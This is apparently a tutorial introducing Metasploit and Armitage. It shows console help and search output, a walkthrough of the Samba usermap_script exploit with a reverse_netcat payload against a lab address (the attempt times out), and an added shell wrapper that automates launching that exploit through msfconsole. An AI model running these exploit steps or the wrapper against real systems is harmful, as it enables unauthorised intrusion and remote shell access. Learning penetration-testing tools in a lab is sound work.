Overview of the Metasploit Framework
A powerful penetration testing tool
Its main uses are proving that a vulnerability can be exploited (a PoC intrusion) and then running post-exploitation steps (privilege escalation, data theft, and so on) from the shell obtained.
It makes a wide range of attack scenarios easy to reproduce.
It is driven from the CLI.
└─$ msfconsole
Metasploit tip: View all productivity tips with the tips command
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
[ASCII-art rabbit banner]
https://metasploit.com
=[ metasploit v6.4.38-dev ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
At startup a cute rabbit appears (the opening banner has several different variants).
Display the list of commands grouped by category
msf6 > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
...
Search by keyword
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
1 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
2 \_ target: Automatic . . . .
3 \_ target: Windows 2000 English . . . .
4 \_ target: Windows XP English SP0-1 . . . .
5 \_ target: Windows XP English SP2 . . . .
6 \_ target: Windows 2003 English SP0 . . . .
7 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
8 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
9 \_ target: Windows x86 . . . .
10 \_ target: Windows x64 . . . .
11 post/linux/gather/enum_configs . normal No Linux Gather Configurations
12 auxiliary/scanner/rsync/modules_list . normal No List Rsync Modules
13 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
14 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
15 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
16 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
17 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
18 \_ target: 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10 . . . .
19 \_ target: 2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10 . . . .
20 \_ target: 2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04 . . . .
21 \_ target: 2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10 . . . .
22 \_ target: 2:3.5.6~dfsg-3squeeze6 on Debian Squeeze . . . .
23 \_ target: 3.5.10-0.107.el5 on CentOS 5 . . . .
24 auxiliary/admin/smb/samba_symlink_traversal . normal No Samba Symlink Directory Traversal
25 auxiliary/scanner/smb/smb_uninit_cred . normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
26 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
27 \_ target: Linux (Debian5 3.2.5-4lenny6) . . . .
28 \_ target: Debugging Target . . . .
29 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
30 \_ target: Automatic (Interact) . . . .
31 \_ target: Automatic (Command) . . . .
32 \_ target: Linux x86 . . . .
33 \_ target: Linux x86_64 . . . .
34 \_ target: Linux ARM (LE) . . . .
35 \_ target: Linux ARM64 . . . .
36 \_ target: Linux MIPS . . . .
37 \_ target: Linux MIPSLE . . . .
38 \_ target: Linux MIPS64 . . . .
39 \_ target: Linux MIPS64LE . . . .
40 \_ target: Linux PPC . . . .
41 \_ target: Linux PPC64 . . . .
42 \_ target: Linux PPC64 (LE) . . . .
43 \_ target: Linux SPARC . . . .
44 \_ target: Linux SPARC64 . . . .
45 \_ target: Linux s390x . . . .
46 auxiliary/dos/samba/lsa_addprivs_heap . normal No Samba lsa_io_privilege_set Heap Overflow
47 auxiliary/dos/samba/lsa_transnames_heap . normal No Samba lsa_io_trans_names Heap Overflow
48 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
49 \_ target: Linux vsyscall . . . .
50 \_ target: Linux Heap Brute Force (Debian/Ubuntu) . . . .
51 \_ target: Linux Heap Brute Force (Gentoo) . . . .
52 \_ target: Linux Heap Brute Force (Mandriva) . . . .
53 \_ target: Linux Heap Brute Force (RHEL/CentOS) . . . .
54 \_ target: Linux Heap Brute Force (SUSE) . . . .
55 \_ target: Linux Heap Brute Force (Slackware) . . . .
56 \_ target: Linux Heap Brute Force (OpenWRT MIPS) . . . .
57 \_ target: DEBUG . . . .
58 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
59 \_ target: Automatic . . . .
60 \_ target: Mac OS X 10.4.x x86 Samba 3.0.10 . . . .
61 \_ target: Mac OS X 10.4.x PPC Samba 3.0.10 . . . .
62 \_ target: DEBUG . . . .
63 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
64 \_ target: Solaris 8/9/10 x86 Samba 3.0.21-3.0.24 . . . .
65 \_ target: Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24 . . . .
66 \_ target: DEBUG . . . .
67 auxiliary/dos/samba/read_nttrans_ea_list . normal No Samba read_nttrans_ea_list Integer Overflow
68 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
69 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
70 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
71 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
72 \_ target: Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce . . . .
73 \_ target: Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce . . . .
74 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
75 \_ target: Automatic . . . .
76 \_ target: Windows 2000 . . . .
77 \_ target: Windows XP . . . .
Interact with a module by name or index. For example info 77, use 77 or use exploit/windows/http/sambar6_search_results
After interacting with a module you can manually set a TARGET with set TARGET 'Windows XP'
Of the results above, let's try exploit/multi/samba/usermap_script
Show its options
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.64.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
RHOST: specifies the target host (listed as RHOSTS in the options; the module will not run without it)
msf6 exploit(multi/samba/usermap_script) > set RHOST 192.168.10.150
RHOST => 192.168.10.150
msf6 exploit(multi/samba/usermap_script) > options
...
RHOSTS 192.168.10.150 yes The target host(s), see https://docs.metasploit.com/docs/using-m
...
Alright, run it
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.64.2:4444
[-] 192.168.10.150:139 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.10.150:139) timed out.
[*] Exploit completed, but no session was created.
It failed, but that is the general idea.
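The use / set RHOSTS / run sequence above, as a non-interactive msfconsole resource script with a TCP reachability check in front of it, so that the "[unreachable]" timeout seen above is caught before msfconsole is even launched. This is an added example, not code from the page or from the Metasploit project; the helper names, the nc -z check and the MSF_RUN variable are this example's own assumptions, while the module path and option names are the ones shown on the page.

```shell
#!/bin/sh
# Example wrapper (not part of the page): builds a msfconsole resource script for
# the usermap_script module and checks that RHOSTS:RPORT accepts a TCP connection
# first, because a closed or filtered port is what produces the
# "Exploit failed [unreachable]: Rex::ConnectionTimeout" line seen above.

MODULE="exploit/multi/samba/usermap_script"

# Accept only a dotted-quad IPv4 address with every octet in 0..255.
validate_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

# Print the resource-script body: the same commands typed interactively above.
build_rc() {
    printf 'use %s\n' "$MODULE"
    printf 'set RHOSTS %s\n' "$1"
    printf 'set RPORT %s\n' "$2"
    printf 'set LHOST %s\n' "$3"
    printf 'set LPORT %s\n' "$4"
    printf 'run\n'
    printf 'exit\n'
}

# TCP connect check with a 3 s timeout (assumes an OpenBSD-style nc with -z).
port_reachable() {
    nc -z -w 3 "$1" "$2" >/dev/null 2>&1
}

# Refuse malformed addresses, verify reachability, then hand the script to msfconsole.
run_module() {
    validate_ipv4 "$1" || { echo "bad RHOSTS: $1" >&2; return 2; }
    validate_ipv4 "$3" || { echo "bad LHOST: $3" >&2; return 2; }
    if ! port_reachable "$1" "$2"; then
        echo "$1:$2 not reachable; msfconsole would report [unreachable]" >&2
        return 3
    fi
    rc_file="$(mktemp)"
    build_rc "$1" "$2" "$3" "$4" > "$rc_file"
    msfconsole -q -r "$rc_file"
}

# Usage: MSF_RUN=1 sh usermap.sh 192.168.10.150 139 192.168.64.2 4444
if [ -n "${MSF_RUN:-}" ]; then
    run_module "$@"
fi
```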
Overview of Armitage
Armitage is a tool that lets you drive the Metasploit Framework from a GUI.
In short, the Metasploit Framework is a bit tedious to operate, so Armitage was built to let you do the same work with mouse clicks.
Hosts and services are laid out as icons, and vulnerability scans and exploits are launched by drag and drop, so even learners unfamiliar with the CLI can follow the steps visually.
Operation
The Linux penguins in the upper pane are the target hosts; they appear as penguins because their OS is set to Linux.
Attacks > Hail Mary
checks for vulnerabilities
The attacks that can be executed are then listed